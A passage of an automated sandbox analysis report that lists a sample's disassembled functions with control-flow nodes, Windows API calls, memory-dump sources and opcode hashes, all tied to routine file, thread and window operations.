                                                                                          • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                          • String ID: EDIT
                                                                                          • API String ID: 4243998846-3080729518
                                                                                          • Opcode ID: 5198dd27efd6ef2cfe81d4e1a42d30dc263c523227a297f5f4c02164b2b5e029
                                                                                          • Instruction ID: 6175fa8ae8f8e0f862c6d962b1b8b27dcb545b6fc956ae7ae87134b7728828fa
                                                                                          • Opcode Fuzzy Hash: 5198dd27efd6ef2cfe81d4e1a42d30dc263c523227a297f5f4c02164b2b5e029
                                                                                          • Instruction Fuzzy Hash: 90013C61F1DF8BC1FA209B22F8507B66390AF98784F881031C94DCA795EF3CE54DA640
                                                                                          Function 00007FF6373A2CE0 Relevance: 6.1, APIs: 4, Instructions: 136fileCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 4184 7ff6373a2ce0-7ff6373a2d0a 4185 7ff6373a2d13-7ff6373a2d1b 4184->4185 4186 7ff6373a2d0c-7ff6373a2d0e 4184->4186 4188 7ff6373a2d2b 4185->4188 4189 7ff6373a2d1d-7ff6373a2d28 GetStdHandle 4185->4189 4187 7ff6373a2ea9-7ff6373a2ec4 call 7ff6373c2320 4186->4187 4191 7ff6373a2d31-7ff6373a2d3d 4188->4191 4189->4188 4193 7ff6373a2d3f-7ff6373a2d44 4191->4193 4194 7ff6373a2d86-7ff6373a2da2 WriteFile 4191->4194 4196 7ff6373a2daf-7ff6373a2db3 4193->4196 4197 7ff6373a2d46-7ff6373a2d7a WriteFile 4193->4197 4195 7ff6373a2da6-7ff6373a2da9 4194->4195 4195->4196 4198 7ff6373a2ea2-7ff6373a2ea6 4195->4198 4196->4198 4199 7ff6373a2db9-7ff6373a2dbd 4196->4199 4197->4195 4200 7ff6373a2d7c-7ff6373a2d82 4197->4200 4198->4187 4199->4198 4201 7ff6373a2dc3-7ff6373a2dd8 call 7ff63739b4f8 4199->4201 4200->4197 4202 7ff6373a2d84 4200->4202 4205 7ff6373a2e1e-7ff6373a2e6d call 7ff6373c797c call 7ff63739129c call 7ff63739bca8 4201->4205 4206 7ff6373a2dda-7ff6373a2de1 4201->4206 4202->4195 4205->4198 4217 7ff6373a2e6f-7ff6373a2e86 4205->4217 4206->4191 4207 7ff6373a2de7-7ff6373a2de9 4206->4207 4207->4191 4210 7ff6373a2def-7ff6373a2e19 4207->4210 4210->4191 4218 7ff6373a2e88-7ff6373a2e9b 4217->4218 4219 7ff6373a2e9d call 7ff6373c220c 4217->4219 4218->4219 4220 7ff6373a2ec5-7ff6373a2ecb call 7ff6373c7904 4218->4220 4219->4198
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileWrite$Handle
                                                                                          • String ID:
                                                                                          • API String ID: 4209713984-0
                                                                                          • Opcode ID: c0878563cb540de980db5307815f43949119fc8f7ca07e724854b0feeef95fd0
                                                                                          • Instruction ID: c7cc8a25d9b891f5c9ea33d3c9f1402a59f0450d3cb6554681f7ae0f356eafdb
                                                                                          • Opcode Fuzzy Hash: c0878563cb540de980db5307815f43949119fc8f7ca07e724854b0feeef95fd0
                                                                                          • Instruction Fuzzy Hash: 27512223B1DA4292FE90CB25D805BBA2360FF94B90F000131EA5E87BA0DF3CE495E300
                                                                                          Function 00007FF6373C03E0 Relevance: 6.1, APIs: 4, Instructions: 123COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo_noreturn$TextWindow
                                                                                          • String ID:
                                                                                          • API String ID: 2912839123-0
                                                                                          • Opcode ID: 4545a4d965027abc5525eaa64a011eb323a3d8b8803950167f2ec84c55f0684f
                                                                                          • Instruction ID: bb40999336b1cd8f84c171d4d7b1aed84d1cfcc2adf7c351970e19f81115a11d
                                                                                          • Opcode Fuzzy Hash: 4545a4d965027abc5525eaa64a011eb323a3d8b8803950167f2ec84c55f0684f
                                                                                          • Instruction Fuzzy Hash: B751A1A2F2CAA685FF009BA5D8452ED2362AF45BA5F400235DB5D96BE6DF7CE440D300
                                                                                          Function 00007FF6373A3684 Relevance: 6.1, APIs: 4, Instructions: 94COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateDirectory$ErrorLast_invalid_parameter_noinfo_noreturn
                                                                                          • String ID:
                                                                                          • API String ID: 2359106489-0
                                                                                          • Opcode ID: a981d72998619812671fb74e2af9e44be046492d5270f9ab3d6661079687cefa
                                                                                          • Instruction ID: a531837255d2c4bd33add27c539cabfa042c8662bc88b9fe96d3d884fb700dd0
                                                                                          • Opcode Fuzzy Hash: a981d72998619812671fb74e2af9e44be046492d5270f9ab3d6661079687cefa
                                                                                          • Instruction Fuzzy Hash: E931A462E0C78281FEA09B25A4862796391FF8E7A0F550231EE9DC37E5DF3DE445A601
                                                                                          Function 00007FF6373C2D6C Relevance: 6.1, APIs: 4, Instructions: 94COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
                                                                                          • String ID:
                                                                                          • API String ID: 1452418845-0
                                                                                          • Opcode ID: f380b52e8f95e6a0f24ce785192d8cb773bc143ddf3d62aee805abe4fb8ed354
                                                                                          • Instruction ID: 8fbe8979ed668bddb79bf26310cb9836e617871644d5727079dc496fb55d7014
                                                                                          • Opcode Fuzzy Hash: f380b52e8f95e6a0f24ce785192d8cb773bc143ddf3d62aee805abe4fb8ed354
                                                                                          • Instruction Fuzzy Hash: 71316922E0C22346FA54BB75D4563FA2291AF45786F440434EA0ECB3E7DE3CB804B246
                                                                                          Function 00007FF6373D0B78 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetEnvironmentStringsW.KERNELBASE(?,?,?,?,?,?,?,00007FF6373CC45B), ref: 00007FF6373D0B91
                                                                                          • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF6373CC45B), ref: 00007FF6373D0BF3
                                                                                          • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF6373CC45B), ref: 00007FF6373D0C2D
                                                                                          • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF6373CC45B), ref: 00007FF6373D0C57
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                                                                          • String ID:
                                                                                          • API String ID: 1557788787-0
                                                                                          • Opcode ID: 23704c5f87cc5d65a6a85ab0da0438508b9fc27f2b888927c3d6011bf25654c1
                                                                                          • Instruction ID: e48baaa63196d2a5e74c77504b99da758c739db0a19a84484eb1fb200eb1a4a0
                                                                                          • Opcode Fuzzy Hash: 23704c5f87cc5d65a6a85ab0da0438508b9fc27f2b888927c3d6011bf25654c1
                                                                                          • Instruction Fuzzy Hash: 0C219631F1CB5581F6249F22A440169B6A4FF98FD0B484134DE8EA7BE4DF3CE452A708
                                                                                          Function 00007FF6373A2320 Relevance: 6.1, APIs: 4, Instructions: 58fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$FileHandleRead
                                                                                          • String ID:
                                                                                          • API String ID: 2244327787-0
                                                                                          • Opcode ID: 5dece825d5be91adec6864fa12bb564f4e3b5809c08bfde6ef0babe01e3581d0
                                                                                          • Instruction ID: 53d07cd051add0dfb7b353ee970f9343376815a20267a41fae8abbc4860806d9
                                                                                          • Opcode Fuzzy Hash: 5dece825d5be91adec6864fa12bb564f4e3b5809c08bfde6ef0babe01e3581d0
                                                                                          • Instruction Fuzzy Hash: 8621A121E0C64285FEA09F21A40523D63A0FFC6B94F144530DA9DCA7D8CF7EE8A5A711
                                                                                          Function 00007FF6373AE948 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF6373AECD8: ResetEvent.KERNEL32 ref: 00007FF6373AECF1
                                                                                            • Part of subcall function 00007FF6373AECD8: ReleaseSemaphore.KERNEL32 ref: 00007FF6373AED07
                                                                                          • ReleaseSemaphore.KERNEL32 ref: 00007FF6373AE974
                                                                                          • CloseHandle.KERNELBASE ref: 00007FF6373AE993
                                                                                          • DeleteCriticalSection.KERNEL32 ref: 00007FF6373AE9AA
                                                                                          • CloseHandle.KERNEL32 ref: 00007FF6373AE9B7
                                                                                            • Part of subcall function 00007FF6373AEA5C: WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,00007FF6373AE95F,?,?,?,00007FF6373A463A,?,?,?), ref: 00007FF6373AEA63
                                                                                            • Part of subcall function 00007FF6373AEA5C: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF6373AE95F,?,?,?,00007FF6373A463A,?,?,?), ref: 00007FF6373AEA6E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseHandleReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                                          • String ID:
                                                                                          • API String ID: 502429940-0
                                                                                          • Opcode ID: 7c4c69b688bb09167c3d8ec6f4195a818a409db0987586a56ae23aa503e7e0cd
                                                                                          • Instruction ID: 518731af4d346f3e8c476c78afef4989e927581fc50977fb1873deae7eee7d1d
                                                                                          • Opcode Fuzzy Hash: 7c4c69b688bb09167c3d8ec6f4195a818a409db0987586a56ae23aa503e7e0cd
                                                                                          • Instruction Fuzzy Hash: D3012D32A19A81A2F6489B21E5456ADA370FF84B80F004031DB6D43725CF39F4B59744
                                                                                          Function 00007FF6373AEAA4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: Thread$CreatePriority
                                                                                          • String ID: CreateThread failed
                                                                                          • API String ID: 2610526550-3849766595
                                                                                          • Opcode ID: cf4f3858e1c5421656891f758a667cd72a6f2059ba57d4f8d940dbc9b5e0f540
                                                                                          • Instruction ID: e7ac6016fd4c7779d81cf3aae79e909eb919a0b524f43a598837c82b86fcd426
                                                                                          • Opcode Fuzzy Hash: cf4f3858e1c5421656891f758a667cd72a6f2059ba57d4f8d940dbc9b5e0f540
                                                                                          • Instruction Fuzzy Hash: 36118F32A0DB4281FB00DB14E8422AA7370FB94784F544235DA8E82768EF3CE586EB00
                                                                                          Function 00007FF6373B946C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26comCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: DirectoryInitializeMallocSystem
                                                                                          • String ID: riched20.dll
                                                                                          • API String ID: 174490985-3360196438
                                                                                          • Opcode ID: b1936b3f38021c99ecd6522b050f6163774a90ef7a51b133bb98bdb322c125e4
                                                                                          • Instruction ID: 2bd128799ea4a5f051da2c0b26f7817ecb9ef4bb4fc6741df36a2feb71a30296
                                                                                          • Opcode Fuzzy Hash: b1936b3f38021c99ecd6522b050f6163774a90ef7a51b133bb98bdb322c125e4
                                                                                          • Instruction Fuzzy Hash: F6F06272A1DA4282FB409F20F8551AEB3A0FF88754F800135E98D82764DF7CD14DDB00
                                                                                          Function 00007FF6373B095C Relevance: 4.7, APIs: 3, Instructions: 152windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF6373B853C: GlobalMemoryStatusEx.KERNEL32 ref: 00007FF6373B856C
                                                                                            • Part of subcall function 00007FF6373AAAE0: LoadStringW.USER32 ref: 00007FF6373AAB67
                                                                                            • Part of subcall function 00007FF6373AAAE0: LoadStringW.USER32 ref: 00007FF6373AAB80
                                                                                            • Part of subcall function 00007FF637391FA0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF637391FFB
                                                                                            • Part of subcall function 00007FF63739129C: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF637391396
                                                                                          • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6373C01BB
                                                                                          • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6373C01C1
                                                                                          • SendDlgItemMessageW.USER32 ref: 00007FF6373C01F2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo_noreturn$LoadString$Concurrency::cancel_current_taskGlobalItemMemoryMessageSendStatus
                                                                                          • String ID:
                                                                                          • API String ID: 3106221260-0
                                                                                          • Opcode ID: 48f7460856490a08a1dfbaf42e0e8179e100db638ce86cb13893e8b540cb7b7b
                                                                                          • Instruction ID: 4c65238a3a96eac1dd30a153f1318ac78c6bfb2d9616e98c881f293f0437b776
                                                                                          • Opcode Fuzzy Hash: 48f7460856490a08a1dfbaf42e0e8179e100db638ce86cb13893e8b540cb7b7b
                                                                                          • Instruction Fuzzy Hash: D751B262F1DA9696FB109BB5D8452FD2362AB89BC4F400236DE1D977DAEE3CE500D340
                                                                                          Function 00007FF6373A2134 Relevance: 4.6, APIs: 3, Instructions: 114fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateFile$_invalid_parameter_noinfo_noreturn
                                                                                          • String ID:
                                                                                          • API String ID: 2272807158-0
                                                                                          • Opcode ID: fadebd8b54f10f1951c29d3e9f7df512abc916790a43b14df76b265dc45515ba
                                                                                          • Instruction ID: 47a542bedfcdec0814d34b284bbd92f2bf91d4bf99c0022324df59fa163d5ff6
                                                                                          • Opcode Fuzzy Hash: fadebd8b54f10f1951c29d3e9f7df512abc916790a43b14df76b265dc45515ba
                                                                                          • Instruction Fuzzy Hash: DA41B272A1CB8682FB908B25E44526963A1FB857B4F105334DFAD47BD5CF3CE4A09700
                                                                                          Function 00007FF6373923F8 Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: TextWindow$Length_invalid_parameter_noinfo_noreturn
                                                                                          • String ID:
                                                                                          • API String ID: 2176759853-0
                                                                                          • Opcode ID: 107cbe78643896cd277503af9d79c84134f19e12336bfdef765791961383781f
                                                                                          • Instruction ID: ad73caf881d38a4fd38beeb21fa78e198aff4d4d108a86265ef4c7416a9e7d5c
                                                                                          • Opcode Fuzzy Hash: 107cbe78643896cd277503af9d79c84134f19e12336bfdef765791961383781f
                                                                                          • Instruction Fuzzy Hash: 8B21A272A1DB8681FA109B65A84027AB365FB89BD0F145235EFDD43BA5DF3CE180C740
                                                                                          Function 00007FF6373B1F94 Relevance: 4.6, APIs: 3, Instructions: 68COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: std::bad_alloc::bad_alloc
                                                                                          • String ID:
                                                                                          • API String ID: 1875163511-0
                                                                                          • Opcode ID: 21b91969b9d64179b995d4837780b836304a3883ec3903795673f1ee3d55d581
                                                                                          • Instruction ID: 5f34d4c89fb04fc3b82c1d95a29dafdf19629ef281f9aa4aababa387f6989623
                                                                                          • Opcode Fuzzy Hash: 21b91969b9d64179b995d4837780b836304a3883ec3903795673f1ee3d55d581
                                                                                          • Instruction Fuzzy Hash: FA31D123E0DA9A91FB249B14E4443B963A0FB44B84F144131E68D96BE9DF7CF946E302
                                                                                          Function 00007FF6373A3D34 Relevance: 4.6, APIs: 3, Instructions: 62COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
